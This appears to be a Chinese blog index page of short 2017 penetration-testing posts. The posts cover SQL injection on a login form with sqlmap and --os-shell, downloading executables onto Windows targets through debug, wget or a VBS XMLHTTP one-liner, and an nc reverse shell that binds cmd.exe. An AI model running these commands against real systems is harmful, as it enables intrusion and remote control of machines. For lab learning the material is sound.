- 博客(5)
- 收藏
- 关注
原创 某站登入框存在post注入
验证方法,在账号密码处输入' 如果报错说明有该漏洞存在。用burp抓包,具体怎么做,之前博客里有: http://blog.csdn.net/qq_36512966/article/details/70976527然后用sqlmap跑包。命令为:sqlmap -r “包的地址”如图,成功注入。是sa权限,而且可以直接仔细--os-shell命令,离内网已经很近了。...
2017-09-29 11:13:36 2033
原创 通过cmd上传文件的方法-debug方法
测试机:xp(32位)工具:exe2bat.exe 位于kali中的 /usr/share/windows-binaries目录原理:将需要上传的程序转换为十六进制hex的形式,然后debug将hex编译还原。如图:执行命令:wine exe2bat.exe ew.exe ew.txt 最后得到一个ew.txt 将里面的代码复制粘贴到测试机的cmd命令下。注:这是一种比较老的方...
2017-09-28 11:58:06 1506
原创 通过cmd上传文件的方法-wget方法
测试机:win2003(win系统都可以,不一一举例)工具:wget.exe用法cmd下wget.exe http://www.xxx.com/xxx -O c:/windows/xxx(本地保存路径)如图:OK,上传成功。其实这个方法比较多余, 因为在拿到shell之后想办法传程序上去,wget.exe是第三方程序作用也是传程序,你有办法传wget.exe上去,就可以传别的,根本用不着wget....
2017-09-27 17:25:29 6391
原创 通过cmd上传文件的方法-vbs脚本
测试机:win2003 (win2008 xp 都行,不一一举例了,但是也有局限性,win7以上的大部分版本就运行不成功)很简单,复制粘贴代码即可:cmd下:echo Set xPost = CreateObject(^"Microsoft.XMLHTTP^"):xPost.Open ^"GET^",^"http://xxx/xxx/wget.exe^",0:xPost.Send():Set sG...
2017-09-27 16:33:02 1020
原创 nc的使用
攻击机:kali 192.168.72.128目标机:win2003 192.168.72.131首先在攻击机监听本地端口7777nc -lvvp 77771在目标机上运行nc.exenc.exe 192.168.72.128 7777 -e c:\windows\system32\cmd.exe在看下攻击机里,OK 成功反弹了shell...
2017-09-27 15:52:17 589
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人